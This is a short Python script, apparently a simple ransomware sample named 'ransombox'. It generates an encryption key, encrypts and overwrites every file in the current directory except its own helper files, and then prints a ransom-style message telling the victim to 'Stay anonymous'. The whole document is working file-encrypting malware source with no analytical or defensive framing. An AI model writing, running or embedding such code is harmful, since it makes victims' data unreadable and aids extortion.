#!/usr/bin/env python3

import os
from cryptography.fernet import Fernet

# Generate and write a new key
key = Fernet.generate_key()
with open("keys.key", "wb") as key_file:
    key_file.write(key)

cipher = Fernet(key)

files = []

for file in os.listdir():
    if file == "ransombox.py" or file == "keys.key" or file == "decrypt.py" or file == "encrypt.py":
        continue
    if os.path.isfile(file):
        files.append(file)

for file in files:
    with open(file, "rb") as thefile:
        contents = thefile.read()
    contents_encrypted = cipher.encrypt(contents)
    with open(file, "wb") as thefile:
        thefile.write(contents_encrypted)

print("Your files have been encrypted. Stay anonymous.")
